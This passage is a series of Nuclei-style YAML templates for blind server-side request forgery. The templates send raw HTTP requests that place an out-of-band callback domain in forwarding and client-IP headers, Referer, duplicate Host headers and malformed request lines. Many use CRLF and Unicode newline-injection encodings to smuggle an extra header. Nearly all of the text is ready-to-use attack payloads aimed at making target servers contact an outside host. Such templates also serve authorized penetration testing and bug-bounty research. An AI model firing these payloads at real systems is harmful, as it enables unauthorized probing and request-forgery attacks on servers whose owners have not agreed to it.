4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-059.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-6.yaml:
--------------------------------------------------------------------------------
1 | id: 0x006
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET @{{Host}}.{{Port}}.BSSRF-006.{{MY-DOMAIN}}# HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-60.yaml:
--------------------------------------------------------------------------------
1 | id: 0x060
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Custom-IP-Authorization: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-060.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-61.yaml:
--------------------------------------------------------------------------------
1 | id: 0x061
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Referer: {{Scheme}}://{{Hostname}}@{{Host}}.{{Port}}.BSSRF-061.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-62.yaml:
--------------------------------------------------------------------------------
1 | id: 0x062
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: {{Host}}.{{Port}}.BSSRF-062.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-63.yaml:
--------------------------------------------------------------------------------
1 | id: 0x063
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-063.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-64.yaml:
--------------------------------------------------------------------------------
1 | id: 0x064
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded: {{Host}}.{{Port}}.BSSRF-064.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-65.yaml:
--------------------------------------------------------------------------------
1 | id: 0x065
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded-For: {{Host}}.{{Port}}.BSSRF-065.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-66.yaml:
--------------------------------------------------------------------------------
1 | id: 0x066
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded: for={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}};by={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}};host={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-67.yaml:
--------------------------------------------------------------------------------
1 | id: 0x067
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-IP: {{Host}}.{{Port}}.BSSRF-067.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-68.yaml:
--------------------------------------------------------------------------------
1 | id: 0x068
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-Addr: {{Host}}.{{Port}}.BSSRF-068.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-69.yaml:
--------------------------------------------------------------------------------
1 | id: 0x069
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-IP: {{Host}}.{{Port}}.BSSRF-069.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-7.yaml:
--------------------------------------------------------------------------------
1 | id: 0x007
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET @{{Host}}.{{Port}}.BSSRF-007.{{MY-DOMAIN}}# HTTP/1.0
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-70.yaml:
--------------------------------------------------------------------------------
1 | id: 0x070
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Client-IP: {{Host}}.{{Port}}.BSSRF-070.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-71.yaml:
--------------------------------------------------------------------------------
1 | id: 0x071
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Client-IP: {{Host}}.{{Port}}.BSSRF-071.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-72.yaml:
--------------------------------------------------------------------------------
1 | id: 0x072
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Cluster-Client-IP: {{Host}}.{{Port}}.BSSRF-072.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-73.yaml:
--------------------------------------------------------------------------------
1 | id: 0x073
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | WL-Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-073.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-74.yaml:
--------------------------------------------------------------------------------
1 | id: 0x074
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-074.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-75.yaml:
--------------------------------------------------------------------------------
1 | id: 0x075
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Fastly-Client-Ip: {{Host}}.{{Port}}.BSSRF-075.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-76.yaml:
--------------------------------------------------------------------------------
1 | id: 0x076
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | True-Client-Ip: {{Host}}.{{Port}}.BSSRF-076.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-77.yaml:
--------------------------------------------------------------------------------
1 | id: 0x077
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Real-IP: {{Host}}.{{Port}}.BSSRF-077.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-78.yaml:
--------------------------------------------------------------------------------
1 | id: 0x078
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Originating-IP: {{Host}}.{{Port}}.BSSRF-078.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-79.yaml:
--------------------------------------------------------------------------------
1 | id: 0x079
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Ali-CDN-Real-IP: {{Host}}.{{Port}}.BSSRF-079.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-8.yaml:
--------------------------------------------------------------------------------
1 | id: 0x008
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET :@{{Host}}.{{Port}}.BSSRF-008.{{MY-DOMAIN}}# HTTP/1.0
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-80.yaml:
--------------------------------------------------------------------------------
1 | id: 0x080
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Src-Ip: {{Host}}.{{Port}}.BSSRF-080.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-81.yaml:
--------------------------------------------------------------------------------
1 | id: 0x081
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Cdn-Real-Ip: {{Host}}.{{Port}}.BSSRF-081.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-82.yaml:
--------------------------------------------------------------------------------
1 | id: 0x082
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | CF-Connecting-IP: {{Host}}.{{Port}}.BSSRF-082.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-83.yaml:
--------------------------------------------------------------------------------
1 | id: 0x083
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Host: {{Host}}.{{Port}}.BSSRF-083.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-84.yaml:
--------------------------------------------------------------------------------
1 | id: 0x084
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Custom-IP-Authorization: {{Host}}.{{Port}}.BSSRF-084.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-85.yaml:
--------------------------------------------------------------------------------
1 | id: 0x085
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-085.{{MY-DOMAIN}}/.{{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-86.yaml:
--------------------------------------------------------------------------------
1 | id: 0x086
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0d%0aHost:%20{{Host}}.{{Port}}.BSSRF-086.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-87.yaml:
--------------------------------------------------------------------------------
1 | id: 0x087
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AHost:%20{{Host}}.{{Port}}.BSSRF-087.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-88.yaml:
--------------------------------------------------------------------------------
1 | id: 0x088
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0DHost:%20{{Host}}.{{Port}}.BSSRF-088.{{MY-DOMAIN}}%0D%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-89.yaml:
--------------------------------------------------------------------------------
1 | id: 0x089
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0AHost:%20{{Host}}.{{Port}}.BSSRF-089.{{MY-DOMAIN}}%0A%0A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-9.yaml:
--------------------------------------------------------------------------------
1 | id: 0x009
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Host: {{Host}}.{{Port}}.BSSRF-009.{{MY-DOMAIN}}
14 | Cache-Control: no-transform
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | unsafe: true
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-90.yaml:
--------------------------------------------------------------------------------
1 | id: 0x090
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%3F%0DHost:%20{{Host}}.{{Port}}.BSSRF-090.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-91.yaml:
--------------------------------------------------------------------------------
1 | id: 0x091
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.10x0D0x0ADHost:%20{{Host}}.{{Port}}.BSSRF-091.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-92.yaml:
--------------------------------------------------------------------------------
1 | id: 0x092
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1\u560d\u560aHost:%20{{Host}}.{{Port}}.BSSRF-092.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-93.yaml:
--------------------------------------------------------------------------------
1 | id: 0x093
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0d%0aX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-093.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-94.yaml:
--------------------------------------------------------------------------------
1 | id: 0x094
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-094.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-95.yaml:
--------------------------------------------------------------------------------
1 | id: 0x095
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0DX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-095.{{MY-DOMAIN}}%0D%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
